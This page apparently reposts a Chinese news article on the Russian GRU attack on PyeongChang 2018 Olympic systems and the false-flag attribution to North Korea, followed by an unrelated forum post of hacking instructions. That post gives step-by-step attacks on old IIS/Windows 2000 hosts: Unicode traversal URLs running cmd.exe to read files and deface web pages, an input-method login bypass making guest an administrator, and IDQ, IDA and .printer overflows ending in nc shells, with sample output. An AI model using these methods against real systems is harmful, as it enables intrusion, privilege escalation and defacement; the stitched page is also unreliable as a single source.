俄罗斯黑客入侵冬奥会系统,还甩锅给朝鲜?

版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://csdnnews.blog.csdn.net/article/details/79385518

点击上方“CSDN”,选择“置顶公众号”

关键时刻,第一时间送达!

2月25日,这届在韩国平昌举行的冬季奥运会,终于在国人的骂声中结束了。

庆幸的是,我们仍看到了不给对手和裁判留一丝机会的中国选手武大靖,深受俄罗斯美女欢迎的日本选手羽生结弦,不服输的美国选手肖恩·怀特,以及几乎包揽全场速滑奖牌的荷兰姑娘们。而随着张艺谋导演的“北京八分钟”惊艳世界,2022年冬季奥运会正式进入北京时间。尽管冰场上除韩国选手之外的参赛者们遭遇了种种不公平裁判,但也终成过去时。

事后,再次翻看此次盛事,我们发现:奥运会竟然还遭到了严重的黑客攻击。

2月24日,据《华盛顿邮报》报道,美国情报部认为,俄罗斯黑客攻击了平昌奥运会的数百部电脑,不愿透露姓名的美国官员讨论敏感问题时说,他们这样做是为了让它看起来好像侵入是由朝鲜进行的,这就是所谓的“伪旗”操作。

原来,在2月9日晚间平昌奥运会开幕式举行时,平昌奥组委官网遭到网络攻击。当晚,主新闻中心的IPTV(交互式网络电视)突然黑屏,正在通过观看开幕式直播进行新闻报道的各国记者们一时不知所措。


640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1

随后,遭遇外部网络攻击后,奥组委关闭了内部网络服务器,致官网彻底关闭,一些进入官网打印门票的市民无法进行操作,导致空座位。结果,直到2月10日上午8点奥组委官网才恢复正常。

而实际上,除了攻击冬奥会计算机之外,俄罗斯黑客上个月还在韩国攻击了路由器,并在奥运会开始的当天部署了新的恶意软件。

部分网络安全专家表示,在奥运会这样的世界级体育盛事时,会有一些黑客为追求利益而采取网络攻击行动。但还有分析人士猜测,这场混乱是对国际奥委会报复,因为不少俄罗斯选手涉及兴奋剂丑闻而被国际奥委会禁赛,虽然有些运动员被允许以“来自俄罗斯的奥运会运动员”的名义参赛,但他们无法在他们的制服上展示俄罗斯国旗,如果他们赢得了奖牌,现场也不会奏响俄罗斯国歌。

造成的影响有多大?

根据本月的一份情报报告,截至2月初,俄罗斯军方情报组织GRU可以访问多达300台奥运会计算机。对此,俄罗斯国家情报局局长拒绝发表评论。

然而,这份尚未公开确认的情报与行业分析师的报告一致,其中称俄罗斯确有针对2018年奥运会的迹象,包括2016年里约热内卢举办的夏季奥运会。

 “我们正在密切关注它,这实质上是一个韩国问题,”一位美国官员补充说。 “我们会按照要求帮助韩国人。”

一位信息安全专家表示,开幕式期间访问的计算机造成的破坏力尚不清楚。

前国家安全局网络运营商兼网络安全公司Rendition Infosec联合创始人Jake Williams提到:“任何控制路由器的人都可以根据一个或多个选定目标改变流量,或通过完全停止路由造成网络全面中断。”

他继续称:“路由器恶意软件的开发成本非常高昂,俄罗斯可能只在可实现高价值利润的地区进行使用。

为何矛头纷纷指向俄罗斯黑客?

其实早在1月,代号为“Fancy Bear”(奇幻熊)的俄罗斯黑客组织就公布了一份世界反兴奋剂机构(WADA)与国际奥委会(IOC)之间关于俄罗斯运动员涉药问题的电子邮件。那么,此次事件是否确是俄罗斯黑客有意而为之呢?


640?wx_fmt=jpeg

据西方情报机构称,此前服务于GRU即GRU特别技术中心(GTsST)的黑客组织,一直积极参与针对西方的信息战,而且还是去年NotPetya网络攻击导致乌克兰瘫痪的幕后黑手。

两年前,GRU透露了一个包含药物测试结果和机密医学数据的数据库,并公布了美国最有价值运动员的个人信息,如网球明星赛琳娜(Serena )和维纳斯威·廉姆斯(Venus Williams),四次体操金牌得主西蒙娜·比尔斯(Simone Biles )和女子篮球明星埃琳娜·戴尔·多恩(Elena Delle Donne)。

那一年,几乎每个俄罗斯田径组队员都被禁止参加2016年奥运会,这一行为被广泛认为是俄罗斯方面的报复。

约翰霍普金斯大学战略研究教授Thomas Rid指出,俄罗斯在奥运会采取这种“积极措施”的历史尚可追溯。例如,在1984年洛杉矶奥运会期间,苏联情报部门发布假三氯联苯传单,威胁要对非洲运动员实施暴力行为,目的就是为了让美国打脸。但结果,并没能让苏联方得偿所愿。

所以,联想到这件事情上,GRU似乎又故技重施,试图让这起网络攻击看起来像是朝鲜黑客所为。那么,事情的真相究竟是怎样呢?

640?wx_fmt=jpeg640?wx_fmt=gif

展开阅读全文

黑客入侵方法!!!!!!!!!!!

11-02

(1) UNICODE漏洞入侵 rn“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。 rn第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如: rn/scripts/..%c0%af../winnt/system32/cmd.exe rn这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。 rn我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机 rn如http://192.168.0.111/scripts/..%c0%...ystem32/cmd.exe rn意思是192.168.0.111主机有 %c0%af 漏洞, rn目标有了,我们马上打开浏览器。在网址栏里输入: rnhttp://192.168.0.111/scripts/..%c0%....exe?/c+dir+c:\ 回车 rn意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如: rnDirectory of c:\ rn2002-03-13 03:47p 289 default.asp rn2002-02-11 03:47p 289 default.htm rn2002-03-09 04:35p Documents and Settings rn2002-02-11 03:47p 289 index.asp rn2002-02-11 03:47p 289 index.htm rn2002-05-08 05:19a Inetpub rn2002-01-19 10:37p MSSQL7 rn2002-03-09 04:22p Program Files rn2002-01-23 06:21p WINNT rn4 File(s) 1,156 bytes rn5 Dir(s) 2,461,421,568 bytes free rn------------------------------ rn的目录列表。也会碰到看不到文件的空目录。 rn好,我们成功看到了机器里的C盘了。 rn我们在浏览器里输入: rnhttp://192.168.0.111/scripts/..%c0%.../cmd.exe?/c+set 回车 rnCGI Error rnThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: rnrnALLUSERSPROFILE=C:\Documents and Settings\All Users rnCommonProgramFiles=C:\Program Files\Common Files rnCOMPUTERNAME=ON rnComSpec=C:\WINNT\system32\cmd.exe rnCONTENT_LENGTH=0 rnGATEWAY_INTERFACE=CGI/1.1 rnHTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* rnHTTP_ACCEPT_LANGUAGE=zh-cn rnHTTP_CONNECTION=Keep-Alive rnHTTP_HOST=192.168.0.111 rnHTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90) rnHTTP_ACCEPT_ENCODING=gzip, deflate rnHTTPS=off rnINSTANCE_ID=1 rnLOCAL_ADDR=192.168.0.111 rnNUMBER_OF_PROCESSORS=1 rnOs2LibPath=C:\WINNT\system32\os2\dll; rnOS=Windows_NT rnPath=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN rnPATH_TRANSLATED=c:\inetpub\wwwroot rnPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH rnPROCESSOR_ARCHITECTURE=x86 rnPROCESSOR_IDENTIFIER=x86 Fa rn----------------- rn哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot rn意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。 rn我们用命令: rnhttp://192.168.0.111/scripts/..%c0%...pub\wwwroot回车 rn我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。 rn我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。 rn我们用命令: rnhttp://192.168.0.111/scripts/..%c0%...wroot\index.asp 回车 rn当看到下面的英文 rnCGI Error rnThe specified CGI application misbehaved by not returning a complete rnset of HTTP headers. The headers it did return are: rn恭喜你,你可以改他的网页了。 rn---------------------------------------- rn但如果你看到下面的英文就不成功,只好换其他机器了。 rnCGI Error rnThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: rnAccess denied - C:\inetpub\wwwroot\index.asp rn----------------------------- rn继续。现在用ECHO改网页的内容。 rnhttp://192.168.0111/scripts/..%c0%a...nt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车 rn当看到 rnCGI Error rnThe specified CGI application misbehaved by not returning a complete rnset of HTTP headers. The headers it did return are: rn的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。 rnrn英文WIN2000 rn/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ rn中文WIN2000 rn/scripts/..%c0%2f../winnt/system32/cmd.exe rn/scripts/..%c1%1c../winnt/system32/cmd.exe rnWIN NT4 rn/scripts/..%c1%9c../winnt/system32/cmd.exe rn英文WIN2000 rn/scripts/..%c0%af../winnt/system32/cmd.exe rn通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ rnrn(2) Windows2000输入法漏洞 rn先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。 rn(3) idq溢出漏洞 rn要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。 rn首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。 rn进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813 rnc:\>nc -vv IP 813 rnIP: inverse host lookup failed: h_errno 11004: NO_DATA rn(UNKNOWN) [IP] 813 (?): connection refused rnsent 0, rcvd 0: NOTSOCK rnc:\> rnrn看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。 rnc:\>nc -vv IP 813 rnIP: inverse host lookup failed: h_errno 11004: NO_DATA rn(UNKNOWN) [IP] 813 (?) open rnMicrosoft Windows 2000 [Version 5.00.2195] rn(C) Copyright 1985-2000 Microsoft Corp. rnrnC:\WINNT\system32> rn哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。 rnrn(4)IDA溢出漏洞 rn所用程序:idahack rn进入MS-DOS方式(假设idq.exe在c:\下) rnc:\idahack.exe rn运行参数:c:\idahack rnchinese win2k : 1 rnchinese win2ksp1: 2 rnchinese win2ksp2: 3 rnenglish win2k : 4 rnenglish win2ksp1: 5 rnenglish win2ksp2: 6 rnjapanese win2k : 7 rnjapanese win2ksp1: 8 rnjapanese win2ksp2: 9 rnkorea win2k : 10 rnkorea win2ksp1: 11 rnkorea win2ksp2: 12 rnchinese nt sp5 : 13 rnchinese nt sp6 : 14 rnrnc:\idahack 127.0.0.1 80 1 80 rnconnecting... rnsending... rnNow you can telnet to 80 port rnGood luck  rn好,现在你可以telnet它的80端口了,我们用NC来连接。 rnC:\nc 127.0.0.1 80 rnrnMicrosoft Windows 2000 [Version 5.00.2195] rn(C)版权所有 1985-1998 Microsoft Corp rnC:\WINNT\system32> rnOK,现在我们现在上来了,也可IDQ一样是S).printer漏洞 rn这个漏洞,我们用两个程序来入侵。iis5hack和nc。 rnC:\>iis5hack rniis5 remote .printer overflow. writen by sunx rnhttp://www.sunx.org rnfor test only, dont used to hack, rnrnusage: D:\IIS5HACK.EXE rn用法: D:\IIS5HACK rnchinese edition: 0 rnchinese edition, sp1: 1 rnenglish edition: 2 rnenglish edition, sp1: 3 rnjapanese edition: 4 rnjapanese edition, sp1: 5 rnkorea edition: 6 rnkorea edition, sp1: 7 rnmexico edition: 8 rnmexico edition, sp1: 9 rnrnc:\>iis5hack 127.0.0.19 80 1 119 rniis5 remote .printer overflow. writen by sunx rnhttp://www.sunx.org rnfor test only, dont used to hack, rnListn: 80 rnrnconnecting... rnsending... rnNow you can telnet to 3739 port rngood luck rnrn溢出成功! rnc:\>nc 127. 论坛

没有更多推荐了,返回首页